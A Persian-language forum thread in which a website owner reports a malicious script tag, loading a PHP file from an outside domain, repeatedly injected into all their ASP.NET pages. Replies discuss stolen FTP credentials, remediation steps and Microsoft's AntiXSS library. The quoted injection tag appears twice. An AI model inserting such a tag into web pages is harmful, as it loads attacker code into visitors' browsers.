بازم سلام
سایت من حدود یک سالی که راه افتاده مشکل از امروز شروع شد.
یک شخص یا سایتی به تمامی صفحات من این script رو وارد کرده که باعث error شده

<script src=http://hoerclub-kassel.de/img/google08aec982a703a2a1.php ></script>

یعنی این script آخر تمامی صفحات .aspx من وارد میشه و باعث error زیر بالا.



من چند بار امروز صفحاتمو دوباره آپلود کردم اما بازم بعد از چند ساعت اینجوری شد.
خواهشن به دادم برسید که از کار بیکار میشم.

آدرس سایتتو بده.

ارور هم که نزاشتی

من یه همچین مشکلی داشتم البته اسکریپت خیلی طولانیی در حد چند کیلوبایت تکست به ته صفحه هام اضافه می کرد...آخرش پسورد پنل و اف تی پیم رو عوض کردم مشکلم رفع شد...

سلام
دوست عزيز من دو تا از سايت هام دو ماه پيش اينطوري شده بودند كه با تعويض سرور هاستينگ مشكل من حل شد البته بعد از يك ماه كلنجار رفتن
شما اين كارها رو انجام بده:
1- تمام محتويات سايت رو دانلود كن و با آنتي ويروس اسكن كن
2- اسكريپت هاي اضافه شده به تمامي صفحات رو پاك كن
3- اگر از اسكريپت هاي مجاني جاوااسكريپت استفاده كردي حواست بهشون باشه
4-محتويات قبلي سايت رو از روي هاست پاك كن و محتويات جديد رو آپلود كن
5- تمامي پسوردهاي سايتت و كنترل پانل رو عوض كن
6- اگر نهايتاً مشكلت حل نشد با شركت هاستينگ هماهنگ كن و هاست خودت رو از روي يك سرور به روي سرور ديگر منتقل كن.
انشاء ا... مشكلت حل ميشه
موفق باشي

من این مواردی که دوستم گفت چک کردم اما نشد.
راه حل دیگری به ذهنتون میرسه بهم بگید ممنون میشم.

بعضی مواقع برنامه نویسهایی که طراح سایت هستند یک مورد پیش پا افتاده را یادشون میره ...

اونم اینکه اگر ویندوز خودتان آلوده باشه سایتی که می سازید و آپلود می کنید هم از این قاعده پیروی می کنه ...

به عبارتی واضح تر پیشنهاد می کنم سایت را روی یک ویندوز کاملا سیف پابلیش کنید و بعد از کارهایی که دوستان گفتند فایلها را آپلود کنید ...

با تشکر از دوستان محترم
فعلا با عوض کردن password پنل و ftp مشکلم برطرف شده.
از راهنماییتان متشکرم
یا علی

یه سوال : چه جوری هک کردن و passwordرو بدست آوردن ؟!!!

مطمئن نیستم هک شده باشم فکر کنم مشکل از hosting بود بهشون زنگ زدم موضوع رو گفتم اونا گفتن pass عوض کن اگر بازم مشکل داشتی خبر بده تا الان مشکلی نبوده

بازم سلام
سایت من حدود یک سالی که راه افتاده مشکل از امروز شروع شد.
یک شخص یا سایتی به تمامی صفحات من این script رو وارد کرده که باعث error شده

<script src=http://hoerclub-kassel.de/img/google08aec982a703a2a1.php ></script>

یعنی این script آخر تمامی صفحات .aspx من وارد میشه و باعث error زیر بالا.



من چند بار امروز صفحاتمو دوباره آپلود کردم اما بازم بعد از چند ساعت اینجوری شد.
خواهشن به دادم برسید که از کار بیکار میشم.

هنگام ورود به سایت از طریق ftp پسورد رو ذخیره نکنید چون سیستم مبدا ویروسی است. این ویروس پسورد رو به سایت هکر ارسال نموده و اسکریپت های بی مورد به محتوای صفحات اضافه میکند.


مطمئن نیستم هک شده باشم فکر کنم مشکل از hosting بود بهشون زنگ زدم موضوع رو گفتم اونا گفتن pass عوض کن اگر بازم مشکل داشتی خبر بده تا الان مشکلی نبوده

ممکن اسن بعضی مواقع در هاست این اتفاق بیافتد و ویروس مورد نظر در هاست فعال شود.


یه سوال : چه جوری هک کردن و passwordرو بدست آوردن ؟!!! سهل انگاری کاربر و سمت کلاینت.


با تشکر از دوستان محترم
فعلا با عوض کردن password پنل و ftp مشکلم برطرف شده.
از راهنماییتان متشکرم


تنها راه حل این مشکل فعلا همینه .فقط از پسورد طولانی با کاراکتر های خاص استفاده کنید در غیر این صورت این برنامه ادامه خواهد داشت.


بعضی مواقع برنامه نویسهایی که طراح سایت هستند یک مورد پیش پا افتاده را یادشون میره ...

اونم اینکه اگر ویندوز خودتان آلوده باشه سایتی که می سازید و آپلود می کنید هم از این قاعده پیروی می کنه ...

به عبارتی واضح تر پیشنهاد می کنم سایت را روی یک ویندوز کاملا سیف پابلیش کنید و بعد از کارهایی که دوستان گفتند فایلها را آپلود کنید ...

این اتفاق فقط یک بار رخ میدهد بعد از اینکه پسورد لو رفت آپلود از طریق سیستم سالم هیچ فایده ای ندارد.


دوست عزيز من دو تا از سايت هام دو ماه پيش اينطوري شده بودند كه با تعويض سرور هاستينگ مشكل من حل شد البته بعد از يك ماه كلنجار رفتن

نیازی به تغییر سرور نیست.

راه حل دیگه ای وجود نداره که بشه به صفحات aspx وارد شد و حک کرد اونها رو.
مثلا باگ یا راه نفوذ.
مثلا چیزی که اگر تعریفش کنیم توی webconfig اجازه نفوذ بده

دوستان به این اشاره کرده بودند که وقتی سیستم خوده برنامه نویس ویروسیه و فایل رو پابلیش می کنه ممکنه یه سری اتفاقات براش پیش بیاد . حالا مشکل من اینه : مطمئنم سیستمم ویروسیه و چند روز قبل پس از اعمال تغییراتی یه سری صفحات رو آپ کردم و
روی چندتا سیستمی که خودم فایلامو رو اونا جابجا می کنم نمی تونم با موس رو (فقط) تکس های سایت خودم حرکت کنم وحتما باید با TAB برم . البته روی سیستم های دیگه این مشکل شکر خدا وجود نداره
سایتم رو اینترنته و عجله دارم.

با سلام به همه دوستان
مشکلی که داشتم برطرف شد.
گفتم دلیلش رو بزارم شاید بعضی ها هم به این مشکل مواجه بشن و عین من به مشکل بر نخورن.
سایتی که من طراحی کرده بودم رو کس دیگری مدیریت میکرد که اطلاعات کامپیوتری نداشت زمانیکه میخواست در fckeditor مطلب بزاره چون سیستمش ویروسی بود این tag در اون قرار میگرفت البته انتی ویروس نود پیغام میداد اما توجهی نمیکرد و باعث این error میشد.

یا علی

در هنگام طراحی سایت در مواقعی که نیاز است اطلاعاتی از کاربر دریافت کنید باید از کنترلهای سمت سرور استفاده کرد زیرا آنها قابلیت Error Handling دارند و از وارد کردن Malicious Codeها به طور خودکار جلوگیری میکنند،اگر بنا به دلایلی مجبور بودید ValidateRequest آنها را برابر False قرار دهید تا کاربر بتواند در جاهایی که لازم است تگ وارد کند باید در این موقع از Anti Cross Site Scripting خود مایروسافت استفاده کنید که لایبرری است و میتونید از سایت codepelex.com دانلود کنید.
اگر به توضیحات بیشتر در زمینه استفاده از این لایبرری نیاز دارید،بفرمایید بگم!

شاید بقیه ی دوستان اطلاع داشته باشند . اما بنده ندارم . میشه بیشتر توضیح بدید ؟

شاید بقیه ی دوستان اطلاع داشته باشند . اما بنده ندارم . میشه بیشتر توضیح بدید ؟
ابتدا برنامه ای که گفتمو بگیرید نصب کنید(Microsoft Anti-Cross Site Scripting Library V3.1)حجمشم حدود 2.5 مگه.
بعد از نصب باید یه رفرنس به فایل dll که تو مسیر زیره بدید:
C:\Program Files\Microsoft Information Security\Microsoft Anti-Cross Site Scripting Library v3.1\Library
حالا برای استفاده از اون بالای فایل code behindeتون بنویسید:


using Microsoft.Security.Application;

حالا فرض کنید توی یه TextBox از کاربر خواستیم یه مثلا یه سری تگ وارد کنه و بعد قراره از مقدار این textBox جایی استفاده کنیم(مثلا تو یه لیبل نمایش بدیم) ؛از اونجایی که کاربران سایتی که ما خواستیم شیطونن میان به جای اینکه مثل آدم تگ خواسته شدرو وارد کنن یه سری کد خطرناک وارد میکنن(Malicious Code) و باعث خرابکاری میشن،در این مواقع اگه از این لایبرری استفاده نکرده باشید سایتتون آلوده میشه و توی سایتایی مثل گوگل سایت شمارو جز سایتای آلوده به حساب میارن.
حالا چیکار کنیم کاربر شیطون نتونه خرابکاری کنه؟
موقعی که نیاز دارید مقادیر TextBox رو مثلا توی یه لیبل نمایش بدید اینکارو کنید:


lblOutout.Text = AntiXss.GetSafeHtml(txtIMAN.Text);

موفق باشید.

آقا کارت خیلی درسته من خودم شخصا این چنین چیزی رو بلد نبودم.

آقا کارت خیلی درسته من خودم شخصا این چنین چیزی رو بلد نبودم.
خواهش میکنم،من هرچی بلدم از دوستان یاد گرفتم،اگه سوال دیگه ای داشتین در خدمتم.:قلب:

احتمالا باید این dll رو داخل فولدر bin هم باشه موقع آپلود سایت روی هاست.
درسته؟

خیلی توپ کار میکنه فقط اگر بخواهیم اول چک کنیم اگر اطلاعات مشکل داشت، پیغام بده چیکار باید بکنیم.

احتمالا باید این dll رو داخل فولدر bin هم باشه موقع آپلود سایت روی هاست.
درسته؟
فکر میکنم چون بهش رفرنس دادیم پس لازمه که باشه.